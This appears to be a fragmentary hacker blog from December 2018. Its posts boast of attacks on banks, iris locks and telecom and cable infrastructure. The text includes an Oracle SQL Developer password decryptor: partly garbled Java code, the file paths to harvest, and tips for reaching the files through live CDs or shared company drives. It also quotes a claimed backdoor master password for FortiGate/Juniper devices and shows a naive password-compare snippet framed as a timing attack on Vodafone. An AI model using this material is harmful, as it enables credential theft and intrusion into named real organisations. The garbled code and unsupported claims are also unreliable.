Monday, December 10, 2018

close to this...a battery discharge, actually in my amateur opinion, even a mobile phone with 5 volts, will afftect the fence...actually don''t know the distance...the ideia is to...copper wire to the phone...don't know 10 meters...and make the discharge.

at No comments:

gentlemen..we have a problem

at No comments:

Sunday, December 9, 2018

for those about to rock..and don't know I broke iris recognition locks...here's the summary : resolution of the photo of the target 1750 pixels...3D image...and most important iris light movement.

at No comments:

warfare over another weekend...introducing some fast hacking ...on HSBC bank

https://www.docdroid.net/kR8TU2T/hsbc-american-bank-reset-device-pin.pdf

DOCDROID.NET
HSBC american bank reset device pin.pdf
How to… How do I reset my Security Device PIN when I am locked out? If your Security Device is locked, after a number of unsuccessful attempts to enter your PIN into the device, you can reset the PIN using the online PIN reset function. To do so, complete the following steps: 1. Access the HSBCnet...

at No comments:

ESEGUR banking vaults locks with android

at No comments:

Resetting Lock to Default Settings

at No comments:

Saturday, December 8, 2018

ORACLE DB password decryptor

welcome back to war! saturday,06.55 am!
check it out:

In product-preferences.xml the other pieced of the needed information is found in the following tag:

With these two values and the following Java program, you're now able to decrypt the password:
java Decrypt_V4 F35q3vdbVrI= 3e8efb59-8a5a-4c13-b1d5-ff64f987787f

Oracle SQL Developer password decryptor

Oracle SQL Developer allows a user to associate passwords with connections so that the user doesn't have to enter the password each time he opens a connection.
Of course, these passwords need to be stored somewhere. SQL developer stores them in an encrypted form, but it is possible to decrypt them.
In case of SQL developer version 4, two files are needed to find the information to encrypt these passwords. On Windows, these are
  • %APPDATA%\SQL Developer\system*\o.jdeveloper.db.connection*\connections.xml
  • %APPDATA%\SQL Developer\system*\o.sqldeveloper*\product-preferences.xml
%APPDATA% typically has a value of c:\user\username\AppData\Roaming)
In connections.xml, one piece of the needed information is found in the Contents tag:

   F35q3vdbVrI=
In product-preferences.xml the other pieced of the needed information is found in the following tag:
With these two values and the following Java program, you're now able to decrypt the password:
java Decrypt_V4 F35q3vdbVrI= 3e8efb59-8a5a-4c13-b1d5-ff64f987787f

Finding connections.xml and product-preferences.xml

As the two required files are found under %appdata%, they are typically unaccessible for other users.
However, there are at least two ways to access such files.

1. Using a Linux live CD

If you have physical access to the PC or laptop that has the connections.xml and product-preferences.xml and its harddisk is not encrypted, you can mount the PC harddisk with a Linux [live CD (such as Knoppix) and copy the necessary information

2. Using dir /s /b on the company drive

In many (big) companies, there is usually one or more »company drives« that all sorts of people and divisions or departments can store temporary files. Sometimes, database users backup theirconections.xml and product-preferences.xml on such drives.
Assuming this »company drive« is X:, then you can find these files in a cmd.exe window using
cd /d X:
dir /s /b connections.xml product-preferences.xml
You might also be lucky searching git or subversion repositories etc.

Source code (java)

// vi: ft=java

import java.security.MessageDigest;
import java.security.GeneralSecurityException;

import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;

import javax.xml.bind.DatatypeConverter;

//     Requires Java 8:
import java.util.Base64;


public class Decrypt_V4 {

  private static byte[] des_cbc_decrypt(
       byte[] encrypted_password,
       byte[] decryption_key,
       byte[] iv)
  throws GeneralSecurityException
  {

    Cipher cipher = Cipher.getInstance("DES/CBC/PKCS5Padding");
    cipher.init(Cipher.DECRYPT_MODE, new SecretKeySpec(decryption_key, "DES"), new IvParameterSpec(iv));
    return cipher.doFinal(encrypted_password);

  }

  private static byte[] decrypt_v4(
      byte[] encrypted,
      byte[] db_system_id)
  throws GeneralSecurityException
  {

    byte[] encrypted_password = Base64.getDecoder().decode(encrypted);

    byte[] salt = DatatypeConverter.parseHexBinary("051399429372e8ad");

 // key = db_system_id + salt
    byte[] key = new byte[db_system_id.length + salt.length];
    System.arraycopy(db_system_id, 0, key, 0, db_system_id.length);
    System.arraycopy(salt, 0, key, db_system_id.length, salt.length);


    java.security.MessageDigest md = java.security.MessageDigest.getInstance("MD5");
    for (int i=0; i<42 -="" 0="" 8="" argv="" byte="" catch="" db_system_id="" des_cbc_decrypt="" e.tostring="" e="" encrypted="argv[0].getBytes();" encrypted_password="" i="" iv="" key.length="" key="" main="" password="" pre="" public="" return="" secret_key="" static="" string="" system.arraycopy="" system.out.println="" tring="" try="" void="" x="" xception="">

Github respository Oracle-SQL-developer-password-decryptor, path: /Decrypt_V4.java


Links

Ideas and knowhow were taken from https://gist.github.com/ajokela/1846191 and https://github.com/maaaaz/sqldeveloperpassworddecryptor
Source files on github
at No comments:

Friday, December 7, 2018

...and this is the news...NSA firewall fortinet version 5.0.7 ...running...confirmed on twitter

master password for juniper OS from the US gov is :
" FGTAbc11*xy+Qqz27"
...and this is the news...NSA firewall fortinet version 5.0.7 ...running...confirmed on twitter

FORUM.FORTINET.COM
SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7 | Fortinet Technical Discussion Forums
SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7http://seclists.org/fulldisclosure/2016/Jan/26 I have not had a chance to try this. I don't see any threads discussing it. So, I thought I'd share. 

at No comments:

thank you Lord...vodafone FTTH network SIBS...take a look...timing attack...operator by operator...voilá


/*If pw == in returns 1, else returns 0 */
int compVar (char *pw, char *in) {
int i;
for (i=0; i<7 class="text_exposed_show" i="" span="" style="display: inline; font-family: inherit;">
if (pw[i]!=in[i]) {
return 0;
}
}
return 1;
}
int main(void) {
int comp=1;
char pw[]="secret";
char in[7];
int result;
scanf ("%s", in);
result = compVar(pw, in);
printf ("%d", result);
}
at No comments:

and....big cake, around here...(submarines cables national level..) Telvent Portugal, S.A.

and....big cake, around here...

ITCONIC.COM
Itconic - Innovate IT
Empresa global de servicios IT, líder en la gestión de Centros de Datos…
at No comments:

hello worlwide! welcome to another weekend, friday, 06.50 am...nobodies hour!!...back to war!

at No comments:
Subscribe to: Posts (Atom)